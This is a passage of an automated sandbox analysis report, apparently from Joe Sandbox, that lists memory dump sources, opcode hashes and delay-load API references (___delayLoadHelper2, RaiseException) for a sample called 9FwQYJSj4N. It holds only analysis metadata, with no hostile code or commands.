                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 0ac36788fb6949bae5b7582efb04957f4dd97b44810dfb4be52e2cd2da2c207b
                                                                                    • Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
                                                                                    • Opcode Fuzzy Hash: 0ac36788fb6949bae5b7582efb04957f4dd97b44810dfb4be52e2cd2da2c207b
                                                                                    • Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 44fb098375c0c5ba334f77bbd8a0a03b44304a7d0c22e9a2c20088e55b20671b
                                                                                    • Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
                                                                                    • Opcode Fuzzy Hash: 44fb098375c0c5ba334f77bbd8a0a03b44304a7d0c22e9a2c20088e55b20671b
                                                                                    • Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 0fd600838f9711b585ba1f0e32883f8e723eff053ffe7d04b50367a7a8136ec2
                                                                                    • Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
                                                                                    • Opcode Fuzzy Hash: 0fd600838f9711b585ba1f0e32883f8e723eff053ffe7d04b50367a7a8136ec2
                                                                                    • Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 1eb2c4c79e9c3e2c0c3dac93f0bf829b20b41de8a1a41f41e9a7b005441857e1
                                                                                    • Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
                                                                                    • Opcode Fuzzy Hash: 1eb2c4c79e9c3e2c0c3dac93f0bf829b20b41de8a1a41f41e9a7b005441857e1
                                                                                    • Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 45c6e2d182267d78bdf7af9f86a15fb3a99585c7fc514e732f3d3f6d89855fe8
                                                                                    • Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
                                                                                    • Opcode Fuzzy Hash: 45c6e2d182267d78bdf7af9f86a15fb3a99585c7fc514e732f3d3f6d89855fe8
                                                                                    • Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 872f735582d6b4ed508a1fa0931d0746c347efddaaea331264870ef32d5358a0
                                                                                    • Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
                                                                                    • Opcode Fuzzy Hash: 872f735582d6b4ed508a1fa0931d0746c347efddaaea331264870ef32d5358a0
                                                                                    • Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 041501e421993cbd24492b5ba323471598ffec1963f7d3cb79ab16f3d780a845
                                                                                    • Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
                                                                                    • Opcode Fuzzy Hash: 041501e421993cbd24492b5ba323471598ffec1963f7d3cb79ab16f3d780a845
                                                                                    • Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E51F
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: c25cdcf0b3159602ebda62effb6f14a2bbc333c85f38c0c28afa335b3df1e3d5
                                                                                    • Instruction ID: 7611195b5363d596044ea6e6280ccb32252a1cc7716a3774f708a2c409ebd761
                                                                                    • Opcode Fuzzy Hash: c25cdcf0b3159602ebda62effb6f14a2bbc333c85f38c0c28afa335b3df1e3d5
                                                                                    • Instruction Fuzzy Hash: 87A024C115C0037C31051301DD01C3F110CC5C5D10330441FFCC5C40447C441C010430
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E51F
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: e8c931bcaffb5d7f31d46fe1db676df85e6d94d98e66364bea7a697f99d831e5
                                                                                    • Instruction ID: 7611195b5363d596044ea6e6280ccb32252a1cc7716a3774f708a2c409ebd761
                                                                                    • Opcode Fuzzy Hash: e8c931bcaffb5d7f31d46fe1db676df85e6d94d98e66364bea7a697f99d831e5
                                                                                    • Instruction Fuzzy Hash: 87A024C115C0037C31051301DD01C3F110CC5C5D10330441FFCC5C40447C441C010430
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E51F
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 682026b8a93d750a6f76b4eb366f11d3b851e653df1877cd5c78e4b212d55cc0
                                                                                    • Instruction ID: 7611195b5363d596044ea6e6280ccb32252a1cc7716a3774f708a2c409ebd761
                                                                                    • Opcode Fuzzy Hash: 682026b8a93d750a6f76b4eb366f11d3b851e653df1877cd5c78e4b212d55cc0
                                                                                    • Instruction Fuzzy Hash: 87A024C115C0037C31051301DD01C3F110CC5C5D10330441FFCC5C40447C441C010430
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E51F
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: b1941d85eb7029311e5374e4454da15176b6e4c6f080adbd8746da362472eebe
                                                                                    • Instruction ID: 7611195b5363d596044ea6e6280ccb32252a1cc7716a3774f708a2c409ebd761
                                                                                    • Opcode Fuzzy Hash: b1941d85eb7029311e5374e4454da15176b6e4c6f080adbd8746da362472eebe
                                                                                    • Instruction Fuzzy Hash: 87A024C115C0037C31051301DD01C3F110CC5C5D10330441FFCC5C40447C441C010430
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E580
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: c3009052681cb4fe34ffedd3df419aed7df44978b7edfe149079594866819cf9
                                                                                    • Instruction ID: 89c26a5c292a286f63e2603ca45ee87d394c32d3c574eab7931c15f34ef57e62
                                                                                    • Opcode Fuzzy Hash: c3009052681cb4fe34ffedd3df419aed7df44978b7edfe149079594866819cf9
                                                                                    • Instruction Fuzzy Hash: 55A024C15D41013C31051171DD01C3F310CC5D0D11330411FFCC4D40447C441C010430
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E580
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: f1269bb9aea21e3fb017ae7978f8e658535360b9736b1d0bd60148697a477fce
                                                                                    • Instruction ID: 70260e9c02718b751d92c92482ac81e99fdcac753987d2acba6f751e5cbfa044
                                                                                    • Opcode Fuzzy Hash: f1269bb9aea21e3fb017ae7978f8e658535360b9736b1d0bd60148697a477fce
                                                                                    • Instruction Fuzzy Hash: ECA024C155C1037C31051151DD01C3F310CC5C4D10330441FFCC5C40447C441C010430
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E580
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 052e7c27bde04693a42f3ccfd863e322de2353411cb5fdb100c99cc7290fbe8f
                                                                                    • Instruction ID: 70260e9c02718b751d92c92482ac81e99fdcac753987d2acba6f751e5cbfa044
                                                                                    • Opcode Fuzzy Hash: 052e7c27bde04693a42f3ccfd863e322de2353411cb5fdb100c99cc7290fbe8f
                                                                                    • Instruction Fuzzy Hash: ECA024C155C1037C31051151DD01C3F310CC5C4D10330441FFCC5C40447C441C010430
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 7f986950e675d9268b2ff1ba1a43e13ed2dcf6b077fb993624ee12dd9de0f6b1
                                                                                    • Instruction ID: 53698f3235a4866e2b57b2b641f58596c913735743a9ab9627f05dc3196745af
                                                                                    • Opcode Fuzzy Hash: 7f986950e675d9268b2ff1ba1a43e13ed2dcf6b077fb993624ee12dd9de0f6b1
                                                                                    • Instruction Fuzzy Hash: B3A004F555D1537C71055551DD05C7F131DC5D5D51330D51FFCD5D44445C441C451473
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
